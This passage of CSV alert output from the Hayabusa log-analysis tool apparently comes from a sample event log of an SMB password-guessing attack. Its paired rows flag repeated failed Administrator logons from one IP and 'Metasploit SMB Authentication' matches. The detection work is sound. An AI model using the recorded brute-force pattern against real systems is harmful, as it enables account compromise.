NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
